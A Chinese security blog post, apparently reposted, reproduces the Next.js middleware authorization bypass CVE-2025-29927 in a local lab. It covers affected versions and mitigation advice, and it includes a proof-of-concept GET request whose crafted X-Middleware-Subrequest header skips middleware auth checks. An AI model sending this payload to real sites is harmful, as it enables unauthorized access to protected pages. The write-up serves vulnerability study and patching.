【成功复现】Next.js中间件认证绕过漏洞(CVE-2025-29927)

admin 2025年5月6日22:13:07评论3 views字数 895阅读2分59秒阅读模式

网安引领时代,弥天点亮未来  

【成功复现】Next.js中间件认证绕过漏洞(CVE-2025-29927)
0x00写在前面

      本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!

【成功复现】Next.js中间件认证绕过漏洞(CVE-2025-29927)
0x01漏洞介绍
【成功复现】Next.js中间件认证绕过漏洞(CVE-2025-29927)

Next.js是Vercel开源的一个 React 框架,Next.js 是一款基于 React 的热门 Web 应用程序框架,提供服务器端渲染、静态站点生成和集成路由系统等功能。

Next.js 14.2.25之前版本和15.2.3之前版本存在安全漏洞,该漏洞源于如果授权检查发生在中间件中,可能绕过授权检查。

【成功复现】Next.js中间件认证绕过漏洞(CVE-2025-29927)
0x02影响版本
11.1.4 <=next.js<=13.5.6
14.0 <= next.js <14.2.25
15.0 <= next.js <15.2.3
注:利用前提,需要next.js应用使用middleware。
【成功复现】Next.js中间件认证绕过漏洞(CVE-2025-29927)
【成功复现】Next.js中间件认证绕过漏洞(CVE-2025-29927)
0x03漏洞复现

1.访问漏洞环境

【成功复现】Next.js中间件认证绕过漏洞(CVE-2025-29927)

通过浏览器插件获取版本信息

【成功复现】Next.js中间件认证绕过漏洞(CVE-2025-29927)

2.对漏洞进行复现

请求get请求确认中间件

【成功复现】Next.js中间件认证绕过漏洞(CVE-2025-29927)

POC 

漏洞复现

GET / HTTP/1.1Host127.0.0.1:3000X-Nextjs-Data1X-Middleware-Subrequestsrc/middleware:nowaf:src/middleware:src/middleware:src/middleware:src/middleware:middleware:middleware:nowaf:middleware:middleware:middleware:pages/_middleware

      执行payload,通过响应判断漏洞存在。

【成功复现】Next.js中间件认证绕过漏洞(CVE-2025-29927)

3.Yakit插件测试

【成功复现】Next.js中间件认证绕过漏洞(CVE-2025-29927)
【成功复现】Next.js中间件认证绕过漏洞(CVE-2025-29927)
0x04修复建议

目前厂商已发布升级补丁以修复漏洞,补丁获取链接:

临时解决:拦截访问Nextjs应用中HTTP请求头包含的x-middleware-subrequest字段。

建议尽快升级修复漏洞,再次声明本文仅供学习使用,非法他用责任自负!

https://github.com/vercel/next.js/security/advisories/GHSA-f82v-jwr5-mffw

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年5月6日22:13:07
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【成功复现】Next.js中间件认证绕过漏洞(CVE-2025-29927)https://cn-sec.com/archives/4035096.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息